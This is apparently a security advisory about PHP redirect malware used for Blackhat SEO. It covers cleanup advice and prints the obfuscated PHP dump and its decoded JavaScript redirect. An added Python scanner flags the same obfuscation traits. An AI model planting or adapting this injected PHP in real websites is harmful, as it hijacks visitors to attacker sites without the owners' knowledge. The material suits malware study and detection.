
Redirecting website traffic is another malicious Blackhat SEO technique. Blackhat SEO manipulates search engine results in order to benefit a website in terms of relevance.
The attacker used several encoding techniques to hide the JavaScript code that forms the final payload, which redirects the visitor by setting window.location.

Affecting

Any vulnerable PHP-based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files for obfuscated code (similar to the dump below) or for files that you don't recognize. You can also sign up with us and let our team remove the malware for you.

Dump


<?php
/* copyright */
${"\x47L\x4f\x42AL\x53"}["\x73v\x72djd\x71e\x6e"] = "\x76";
${"\x47\x4cOB\x41LS"}["k\x63\x77\x72\x77\x71\x76\x70d\x78\x65\x67"] = "t\x78t";
$bhrnpxrlx = "\x6b";
${"G\x4c\x4f\x42A\x4c\x53"}["kt\x62\x6c\x69tyt\x67\x64"] = "k";
foreach ($_GET as ${$bhrnpxrlx} => ${${"\x47\x4cOB\x41\x4c\x53"}["\x73\x76\x72dj\x64\x71e\x6e"]})
if (preg_match("!\x5e\x5ba-\x7a\x30\x2d9]\x7b\x310\x2c\x33\x32}\$!is", ${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6btblit\x79t\x67d"]})) {
$yghiudnxut = "\x6b";
${"G\x4c\x4fB\x41\x4c\x53"}["\x62\x79\x69\x63h\x6a\x69"] = "t\x78t";
${${"G\x4c\x4fB\x41\x4c\x53"}["byi\x63\x68\x6ai"]} = base64_decode("P\x305o\x633\x52\x79K\x510\x4bey\x42\x32Y\x58\x49g\x61W\x52\x34I\x44\x30\x67\x633\x52\x79\x4c\x6dlu\x5aGV\x34T2Y\x6fJz\x38nKTs\x67a\x57\x59g\x4b\x47\x6c\x6b\x65CA\x39\x50\x53\x41t\xEE\x77\x4e\x54\x42\x44R\x45\x4d\x78\x4dTA4\x4d\x44A\x77N\x55Z\x47Q\x6b\x4aE\x4d\x30\x51\x7aQ\x7a\x55\x77OEY\x33M\x44VGQ\x6a\x41xMDR\x44\x52\x43I\x70Ow\x30\x4bL\x79\x38\x74\x4c\x54\x34g\x50C\x39\x54Q1\x4aJ\x55FQ\x2b");
echo str_replace("\x5aZ\x5a\x5a", ${$yghiudnxut}, ${${"\x47\x4cO\x42AL\x53"}["\x6b\x63\x77\x72\x77\x71v\x70dxe\x67"]});
exit;
}
/* copyright */
?>

Decoded to:
<script language="javascript">window.location="http:// site removed";</script>
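
One way to automate the inspection described under Cleanup, as an added example that is not part of the original write-up: a Python scanner that resolves PHP string escapes and flags the traits visible in the dump above. The function names, the thresholds and the harmless tail of the sample are assumptions made for illustration.

```python
import os
import re

# PHP double-quoted strings accept \xHH and octal escapes; the dump uses \xHH.
ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)

def decode_php_escapes(literal):
    """Resolve hex/octal escapes so the obfuscated names become readable."""
    def repl(m):
        return chr(int(m.group(1), 16) if m.group(1) else int(m.group(2), 8) & 0xFF)
    return ESCAPE.sub(repl, literal)

def inspect_php(source):
    """Return obfuscation traits found in PHP source (thresholds are assumptions)."""
    findings = []
    literals = DQ_STRING.findall(source)
    escaped = [s for s in literals if ESCAPE.search(s)]
    if any(decode_php_escapes(s) == "GLOBALS" for s in escaped):
        findings.append("escape-encoded GLOBALS used as a variable name")
    if len(escaped) >= 3 and len(escaped) * 2 >= len(literals):
        findings.append("most string literals are escape-encoded")
    if re.search(r'\bbase64_decode\s*\(', source) and re.search(r'\becho\b', source):
        findings.append("base64_decode in a script that echoes output")
    if re.search(r'foreach\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b', source):
        findings.append("loops over raw request parameters")
    return findings

def scan_tree(root):
    """Walk a web root and map each flagged PHP file to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".inc")):
                path = os.path.join(dirpath, name)
                with open(path, "r", errors="replace") as fh:
                    hits = inspect_php(fh.read())
                if hits:
                    report[path] = hits
    return report
# Constructed sample: two lines copied from the dump plus a harmless tail.
SAMPLE = r'''<?php
${"\x47L\x4f\x42AL\x53"}["\x73v\x72djd\x71e\x6e"] = "\x76";
${"\x47\x4cOB\x41LS"}["k\x63\x77\x72\x77\x71\x76\x70d\x78\x65\x67"] = "t\x78t";
foreach ($_GET as $k => $v) { echo base64_decode("aGk="); }
'''
CLEAN = '<?php echo "Hello, " . htmlspecialchars($name) . "\\n"; ?>'
if __name__ == "__main__":
    print(inspect_php(SAMPLE), inspect_php(CLEAN))
```

Findings are triage hints: legitimate code can trip individual checks, so review each flagged file before removing it.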